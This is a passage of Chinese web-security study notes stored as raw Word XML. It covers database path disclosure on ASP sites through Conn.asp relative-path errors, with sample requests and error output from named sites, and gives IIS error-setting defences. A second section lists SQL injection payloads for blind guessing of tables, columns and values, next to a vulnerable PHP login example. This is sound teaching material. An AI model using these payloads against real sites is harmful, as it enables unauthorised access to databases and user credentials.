        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>动力文章系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>位于系统下的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>INC</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>目录下，而很多调用它的文件在系统根目录下，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>User_ChkLogin.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>等，这样当</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>执行时，它是在系统根目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“D:\wwwroot\zyx688\wwwroot\”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>下执行的。因此，</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>文件中，调用数据库时它考虑到执行时的目录路径，因而数据库的相对地址写成如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>db="database/fp360609.asp" </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>这样，当它在系统根目录下执行时，数据库的相对路径为根目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“database”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>目录，但当我们直接请求它时，它工作的当前目录是在根目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>INC</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>目录内，这时数据库的相对路径就变成了</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“inc/database/fp360609.asp”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>，这样它当然出错，得到的绝对路径中也多出了</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“inc”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>。为了让大家看得更清楚，我们举一个可以用两种方法暴库的网站，比较一下看有何不同。提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.pofen.com/sc/down\show.asp?id=437 </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>得到：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t xml:space="preserve">“Microsoft JET Database Engine </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t xml:space="preserve"> '80004005' </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>'D:\Webdata\pofen.com\sc\db\download.mdb'</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>不是一个有效的路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>/sc/down/db/user.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>，行</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>6 ” </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>再提交：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>http://www.pofen.com/sc/down/db/user.asp </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>得到：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t xml:space="preserve">Microsoft JET Database Engine </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t xml:space="preserve"> '80004005' </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:lastRenderedPageBreak/>
        <w:t>'D:\Webdata\pofen.com\sc\down\db\db\download.mdb'</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>不是一个有效的路径。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
        <w:t>/sc/down/db/user.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>，行</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>6 </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>两种方法得到的绝对路径，一个比实际路径少了，一个则多了，这两个系统都是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>不在系统根目录下而引起的。那是不是</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>放在根目录，与调用的文件在一个目录下就无事呢？如果在一起，当然没事，但牛人自有牛法子，可以通过构造方法来造成相对路径变化，一样能达到暴库的目的。比如，动网的大挪移手法，将</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>移位，从而暴库。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>当然，实际操作中，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>移走后，网站无法工作，所以没有成功，但这种思路还是给很多人启发。如果有一种方法可以复制而不是移动，或者说，移动的不是</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp,</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>而是调用</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>的其它文件，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Chklogin</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>之类，理论上就可以成功。今天刚看到一个暴动易系统路径的最新方法，其原理就是构造错误而达到获得真实路径的目的。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97399" w:rsidRDefault="00C97399" w:rsidP="00A43EA5"/>
    <w:p w:rsidR="00072854" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="0029155B">
        <w:t>防范暴库</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="0029155B">
        <w:t>说白了，暴库是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>服务器会对每个执行错误给出详细说明，并停止执行，</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>的默认设置又是将错误信息返回给用户。因此，要避免暴库，就应改变</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>的默认设置，选取错误时只给一个出错的通知，不给详细信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>其实，有些虚拟主机为了便于站长调试，一般不关掉信息返回，作为网站管理者，又无法对虚拟主机设置时，只能在网页中加强防范。就是在可能出错的页面加上这一句：</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>“On Error Resume Next”</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>。它的意思是出错后，恢复执行下面的语句，也就是不理会出错，当然就不会给出错误信息了。动易系统</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>3.62</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>版加上这句话后，现在就暴不出路径了，而天意商务网的</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="0029155B">
        <w:t>也不在根目录，但因为加了这句，也暴不出数据库了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防暴库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置截图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3527425"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="22" name="图片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6B" w:rsidRDefault="008C0F6B" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="0048020D" w:rsidRPr="0008506E" w:rsidRDefault="004617DC" w:rsidP="00AC5FB9">
      <w:pPr>
        <w:widowControl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1" w:name="_Toc468296474"/>
      <w:r w:rsidR="0023663F" w:rsidRPr="0008506E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>通用</w:t>
      </w:r>
      <w:r w:rsidR="0023663F" w:rsidRPr="0008506E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0023663F" w:rsidRPr="0008506E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="00547846">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc468296475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and or xor union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="000769BB" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种注入分法：数字型、字符型</w:t>
      </w:r>
      <w:r w:rsidR="00C87879">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00C87879" w:rsidRPr="00EC4738">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>登录框处</w:t>
      </w:r>
      <w:r w:rsidR="00C87879">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、搜索型（抓包，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4738">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>搜索框处</w:t>
      </w:r>
      <w:r w:rsidR="0048020D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）以上这三种是为了</w:t>
      </w:r>
      <w:r w:rsidR="00056B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在代码层面</w:t>
      </w:r>
      <w:r w:rsidR="0048020D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>闭合整个</w:t>
      </w:r>
      <w:r w:rsidR="0048020D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="0048020D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4447619" cy="2019048"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 1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0D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r w:rsidRPr="0095573F">
        <w:t>where' and '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="00163279" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（此注入可行的原因</w:t>
      </w:r>
      <w:r w:rsidR="005B328F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是后台判断逻辑</w:t>
      </w:r>
      <w:r w:rsidR="00BB484F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给出了众多信息，类似如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="00BB484F" w:rsidP="0048020D">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select password from user where username =</w:t>
      </w:r>
      <w:r>
        <w:t>‘“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> . $</w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sername . </w:t>
      </w:r>
      <w:r>
        <w:t>“’”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="00BB484F" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="00BB484F" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F5560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if($password == rs[</w:t>
      </w:r>
      <w:r w:rsidR="006F5560">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006F5560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="006F5560">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="006F5560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="0048020D"/>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="006F5560" w:rsidP="006F5560">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="006F5560">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="006F5560">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码不正确</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00BA420F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="006F5560">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="00BB484F" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无此用户</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00BA420F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>; //</w:t>
      </w:r>
      <w:r w:rsidR="00BA420F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有的人甚至使用</w:t>
      </w:r>
      <w:r w:rsidR="00A15673">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BA420F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名不正确</w:t>
      </w:r>
      <w:r w:rsidR="00A15673">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00BA420F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不应该提供众多信息给公众。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5560" w:rsidRDefault="006F5560" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="00BB484F" w:rsidP="0048020D"/>
    <w:p w:rsidR="00BB484F" w:rsidRDefault="00BB484F" w:rsidP="0048020D"/>
    <w:p w:rsidR="00163279" w:rsidRDefault="00163279" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D"/>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外一种分法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="00E72E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D"/>
    <w:p w:rsidR="0048020D" w:rsidRPr="00755DF8" w:rsidRDefault="0048020D" w:rsidP="0048020D"/>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜表名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exists (select count(*) from admin) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (select count(*) from admin)&gt;=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜列名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exists(select count(name) from admin) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (select count(name) from admin)&gt;=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜列值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(select len(username) from admin)&gt;3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r w:rsidRPr="000D54E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4A8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">select top 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0625">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>asc(mid(username,1,1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4A8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;97</w:t>
      </w:r>
      <w:r w:rsidRPr="000D54E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0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</w:p>
    <w:p w:rsidR="0048020D" w:rsidRPr="008D70AB" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r w:rsidRPr="008D70AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">select username from admin where </w:t>
      </w:r>
      <w:r w:rsidRPr="008D70AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>asc(mid(username,1,1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;90</w:t>
      </w:r>
      <w:r w:rsidRPr="008D70AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜字段数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>order by 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
